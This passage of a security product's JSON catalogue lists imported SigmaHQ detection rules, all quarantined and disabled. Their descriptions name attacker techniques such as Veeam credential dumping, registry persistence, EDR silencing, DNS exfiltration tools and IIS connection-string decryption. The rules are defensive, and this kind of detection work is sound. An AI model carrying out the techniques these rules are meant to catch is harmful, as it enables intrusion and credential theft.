"type": "detection", "name": "Veeam Backup Servers Credential Dumping Script Execution", "description": "Detects execution of a PowerShell script that contains calls to the \"Veeam.Backup\" class, in order to dump stored credentials.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/veeam-backup-servers-credential-dumping-script-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "976d6e6f-a04b-4900-9713-0134a353e38b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_veeam_credential_dumping_script.yml" } }, { "id": "sigmahq-sigma-976dd1f2-a484-45ec-aa1d-0e87e882262b", "type": "detection", "name": "Potential Persistence Via CHM Helper DLL", "description": "Detects when an attacker modifies the registry key \"HtmlHelp Author\" to achieve persistence", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-persistence-via-chm-helper-dll.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "976dd1f2-a484-45ec-aa1d-0e87e882262b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_persistence_chm.yml" } }, { "id": "sigmahq-sigma-977ef627-4539-4875-adf4-ed8f780c4922", "type": "detection", "name": "Auditing Configuration Changes on Linux Host", "description": "Detect changes in auditd configuration files", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/auditing-configuration-changes-on-linux-host.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "977ef627-4539-4875-adf4-ed8f780c4922", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/auditd/path/lnx_auditd_auditing_config_change.yml" } }, { "id": "sigmahq-sigma-979baf41-ca44-4540-9d0c-4fcef3b5a3a4", "type": "detection", "name": "Potential File Extension Spoofing Using Right-to-Left Override", "description": "Detects suspicious filenames that contain a right-to-left override character and a potentially spoofed file extensions.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1036.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-file-extension-spoofing-using-right-to-left-override.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "979baf41-ca44-4540-9d0c-4fcef3b5a3a4", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_susp_right_to_left_override_extension_spoofing.yml" } }, { "id": "sigmahq-sigma-97a80ec7-0e2f-4d05-9ef4-65760e634f6b", "type": "detection", "name": "Security Privileges Enumeration Via Whoami.EXE", "description": "Detects a whoami.exe executed with the /priv command line flag instructing the tool to show all current user privileges. This is often used after a privilege escalation attempt.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1033" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/security-privileges-enumeration-via-whoami-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "97a80ec7-0e2f-4d05-9ef4-65760e634f6b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_whoami_priv_discovery.yml" } }, { "id": "sigmahq-sigma-97aa2e88-555c-450d-85a6-229bcd87efb8", "type": "detection", "name": "Suspicious Screensaver Binary File Creation", "description": "Adversaries may establish persistence by executing malicious content triggered by user inactivity.\nScreensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1546.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-screensaver-binary-file-creation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "97aa2e88-555c-450d-85a6-229bcd87efb8", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_creation_scr_binary_file.yml" } }, { "id": "sigmahq-sigma-97b9ce1e-c5ab-11ea-87d0-0242ac130003", "type": "detection", "name": "PSExec and WMI Process Creations Block", "description": "Detects blocking of process creations originating from PSExec and WMI commands", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1047", "T1569.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/psexec-and-wmi-process-creations-block.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "97b9ce1e-c5ab-11ea-87d0-0242ac130003", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/windefend/win_defender_asr_psexec_wmi.yml" } }, { "id": "sigmahq-sigma-97dbf6e2-e436-44d8-abee-4261b24d3e41", "type": "detection", "name": "Microsoft IIS Connection Strings Decryption", "description": "Detects use of aspnet_regiis to decrypt Microsoft IIS connection strings. An attacker with Microsoft IIS web server access via a webshell or alike can decrypt and dump any hardcoded connection strings, such as the MSSQL service account password using aspnet_regiis command.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/microsoft-iis-connection-strings-decryption.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "97dbf6e2-e436-44d8-abee-4261b24d3e41", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_iis_connection_strings_decryption.yml" } }, { "id": "sigmahq-sigma-97de11cd-4b67-4abf-9a8b-1020e670aa9e", "type": "detection", "name": "Pnscan Binary Data Transmission Activity", "description": "Detects command line patterns associated with the use of Pnscan for sending and receiving binary data across the network.\nThis behavior has been identified in a Linux malware campaign targeting Docker, Apache Hadoop, Redis, and Confluence and was previously used by the threat actor known as TeamTNT", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1046" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/pnscan-binary-data-transmission-activity.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "97de11cd-4b67-4abf-9a8b-1020e670aa9e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_pnscan_binary_cli_pattern.yml" } }, { "id": "sigmahq-sigma-97fbabf8-8e1b-47a2-b7d5-a418d2b95e3d", "type": "detection", "name": "AWS New Lambda Layer Attached", "description": "Detects when a user attached a Lambda layer to an existing Lambda function.\nA malicious Lambda layer could execute arbitrary code in the context of the function's IAM role.\nThis would give an adversary access to resources that the function has access to.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/aws-new-lambda-layer-attached.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "97fbabf8-8e1b-47a2-b7d5-a418d2b95e3d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/aws/cloudtrail/aws_new_lambda_layer_attached.yml" } }, { "id": "sigmahq-sigma-9801abb8-e297-4dbf-9fbd-57dde0e830ad", "type": "detection", "name": "File Download And Execution Via IEExec.EXE", "description": "Detects execution of the IEExec utility to download and execute files", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/file-download-and-execution-via-ieexec-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9801abb8-e297-4dbf-9fbd-57dde0e830ad", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_ieexec_download.yml" } }, { "id": "sigmahq-sigma-98054878-5eab-434c-85d4-72d4e5a3361b", "type": "detection", "name": "HackTool - EDRSilencer Execution - Filter Added", "description": "Detects execution of EDRSilencer, a tool that abuses the Windows Filtering Platform (WFP) to block the outbound traffic of running EDR agents based on specific hardcoded filter names.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-edrsilencer-execution-filter-added.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "98054878-5eab-434c-85d4-72d4e5a3361b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_hktl_edr_silencer.yml" } }, { "id": "sigmahq-sigma-980a7598-1e7f-4962-9372-2d754c930d0e", "type": "detection", "name": "Google Full Network Traffic Packet Capture", "description": "Identifies potential full network packet capture in gcp. This feature can potentially be abused to read sensitive data from unencrypted internal traffic.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1074" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/google-full-network-traffic-packet-capture.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "980a7598-1e7f-4962-9372-2d754c930d0e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/gcp/audit/gcp_full_network_traffic_packet_capture.yml" } }, { "id": "sigmahq-sigma-9827ae57-3802-418f-994b-d5ecf5cd974b", "type": "detection", "name": "Potential Registry Persistence Attempt Via DbgManagedDebugger", "description": "Detects the addition of the \"Debugger\" value to the \"DbgManagedDebugger\" key in order to achieve persistence. Which will get invoked when an application crashes", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1574" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-registry-persistence-attempt-via-dbgmanageddebugger.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9827ae57-3802-418f-994b-d5ecf5cd974b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_dbgmanageddebugger_persistence.yml" } }, { "id": "sigmahq-sigma-982e9f2d-1a85-4d5b-aea4-31f5e97c6555", "type": "detection", "name": "Suspicious WebDav Client Execution Via Rundll32.EXE", "description": "Detects \"svchost.exe\" spawning \"rundll32.exe\" with command arguments like C:\\windows\\system32\\davclnt.dll,DavSetCookie. This could be an indicator of exfiltration or use of WebDav to launch code (hosted on WebDav Server) or potentially a sign of exploitation of CVE-2023-23397", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1048.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-webdav-client-execution-via-rundll32-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "982e9f2d-1a85-4d5b-aea4-31f5e97c6555", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_rundll32_webdav_client_susp_execution.yml" } }, { "id": "sigmahq-sigma-9847f263-4a81-424f-970c-875dab15b79b", "type": "detection", "name": "Suspicious TSCON Start as SYSTEM", "description": "Detects a tscon.exe start as LOCAL SYSTEM", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1219.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-tscon-start-as-system.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9847f263-4a81-424f-970c-875dab15b79b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_tscon_localsystem.yml" } }, { "id": "sigmahq-sigma-98767d61-b2e8-4d71-b661-e36783ee24c1", "type": "detection", "name": "Gzip Archive Decode Via PowerShell", "description": "Detects attempts of decoding encoded Gzip archives via PowerShell.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1132.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/gzip-archive-decode-via-powershell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "98767d61-b2e8-4d71-b661-e36783ee24c1", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_decode_gzip.yml" } }, { "id": "sigmahq-sigma-98a96a5a-64a0-4c42-92c5-489da3866cb0", "type": "detection", "name": "DNS Exfiltration and Tunneling Tools Execution", "description": "Well-known DNS Exfiltration tools execution", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1048.001", "T1071.004", "T1132.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/dns-exfiltration-and-tunneling-tools-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "98a96a5a-64a0-4c42-92c5-489da3866cb0", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_dns_exfiltration_tools_execution.yml" } }, { "id": "sigmahq-sigma-98b53e78-ebaf-46f8-be06-421aafd176d9", "type": "detection", "name": "HackTool - winPEAS Execution", "description": "WinPEAS is a script that search for possible paths to escalate privileges on Windows hosts. The checks are explained on book.hacktricks.xyz", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1082", "T1087", "T1046" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-winpeas-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "98b53e78-ebaf-46f8-be06-421aafd176d9", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_winpeas.yml" } }, { "id": "sigmahq-sigma-98c3bcf1-56f2-49dc-9d8d-c66cf190238b", "type": "detection", "name": "NTLM Logon", "description": "Detects logons using NTLM, which could be caused by a legacy source or attackers", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1550.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/ntlm-logon.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "98c3bcf1-56f2-49dc-9d8d-c66cf190238b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/ntlm/win_susp_ntlm_auth.yml" } }, { "id": "sigmahq-sigma-98c5aeef-32d5-492f-b174-64a691896d25", "type": "detection", "name": "Service Security Descriptor Tampering Via Sc.EXE", "description": "Detection of sc.exe utility adding a new service with special permission which hides that service.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1574.011" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/service-security-descriptor-tampering-via-sc-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "98c5aeef-32d5-492f-b174-64a691896d25", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_sc_sdset_modification.yml" } }, { "id": "sigmahq-sigma-98dedfdd-8333-49d4-9f23-d7018cccae53", "type": "detection", "name": "Enable LM Hash Storage - ProcCreation", "description": "Detects changes to the \"NoLMHash\" registry value in order to allow Windows to store LM Hashes.\nBy setting this registry value to \"0\" (DWORD), Windows will be allowed to store a LAN manager hash of your password in Active Directory and local SAM databases.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/enable-lm-hash-storage-proccreation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "98dedfdd-8333-49d4-9f23-d7018cccae53", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_reg_nolmhash.yml" } }, { "id": "sigmahq-sigma-98ffaed4-aec2-4e04-9b07-31492fe68b3d", "type": "detection", "name": "VMMap Signed Dbghelp.DLL Potential Sideloading", "description": "Detects potential DLL sideloading of a signed dbghelp.dll by the Sysinternals VMMap.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/vmmap-signed-dbghelp-dll-potential-sideloading.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "98ffaed4-aec2-4e04-9b07-31492fe68b3d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_side_load_vmmap_dbghelp_signed.yml" } }, { "id": "sigmahq-sigma-991a9744-f2f0-44f2-bd33-9092eba17dc3", "type": "detection", "name": "Enable Windows Remote Management", "description": "Adversaries may use Valid Accounts to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1021.006" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/enable-windows-remote-management.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "991a9744-f2f0-44f2-bd33-9092eba17dc3", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_enable_psremoting.yml" } }, { "id": "sigmahq-sigma-992a6cae-db6a-43c8-9cec-76d7195c96fc", "type": "detection", "name": "Outbound Network Connection Initiated By Script Interpreter", "description": "Detects a script interpreter wscript/cscript opening a network connection to a non-local network. Adversaries may use script to download malicious payloads.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/outbound-network-connection-initiated-by-script-interpreter.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "992a6cae-db6a-43c8-9cec-76d7195c96fc", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/network_connection/net_connection_win_wscript_cscript_outbound_connection.yml" } }, { "id": "sigmahq-sigma-992dd79f-dde8-4bb0-9085-6350ba97cfb3", "type": "detection", "name": "New BgInfo.EXE Custom VBScript Registry Configuration", "description": "Detects setting of a new registry value related to BgInfo configuration, which can be abused to execute custom VBScript via \"BgInfo.exe\"", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/new-bginfo-exe-custom-vbscript-registry-configuration.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "992dd79f-dde8-4bb0-9085-6350ba97cfb3", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_bginfo_custom_vbscript.yml" } }, { "id": "sigmahq-sigma-993c2665-e6ef-40e3-a62a-e1a97686af79", "type": "detection", "name": "Certificate Use With No Strong Mapping", "description": "Detects a user certificate that was valid but could not be mapped to a user in a strong way (such as via explicit mapping, key trust mapping, or a SID)\nThis could be a sign of exploitation of the elevation of privilege vulnerabilities (CVE-2022-34691, CVE-2022-26931, CVE-2022-26923) that can occur when the KDC allows certificate spoofing by not requiring a strong mapping.\nEvents where the AccountName and CN of the Subject do not match, or where the CN ends in a dollar sign indicating a machine, may indicate certificate spoofing.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/certificate-use-with-no-strong-mapping.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "993c2665-e6ef-40e3-a62a-e1a97686af79", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/system/microsoft_windows_kerberos_key_distribution_center/win_system_kdcsvc_cert_use_no_strong_mapping.yml" } }, { "id": "sigmahq-sigma-994bfd6d-0a2e-481e-a861-934069fcf5f5", "type": "detection", "name": "Active Directory Certificate Services Denied Certificate Enrollment Request", "description": "Detects denied requests by Active Directory Certificate Services.\nExample of these requests denial include issues with permissions on the certificate template or invalid signatures.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1553.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/active-directory-certificate-services-denied-certificate-enrollment-request.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "994bfd6d-0a2e-481e-a861-934069fcf5f5", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/system/microsoft_windows_certification_authority/win_system_adcs_enrollment_request_denied.yml" } }, { "id": "sigmahq-sigma-9976fa64-2804-423c-8a5b-646ade840773", "type": "detection", "name": "Suspicious Outbound SMTP Connections", "description": "Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel.\nThe data may also be sent to an alternate network location from the main command and control server.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1048.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-outbound-smtp-connections.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9976fa64-2804-423c-8a5b-646ade840773", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/network_connection/net_connection_win_susp_outbound_smtp_connections.yml" } }, { "id": "sigmahq-sigma-99793437-3e16-439b-be0f-078782cf953d", "type": "detection", "name": "Tap Installer Execution", "description": "Well-known TAP software installation. Possible preparation for data exfiltration using tunneling techniques", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1048" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/tap-installer-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "99793437-3e16-439b-be0f-078782cf953d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_tapinstall_execution.yml" } }, { "id": 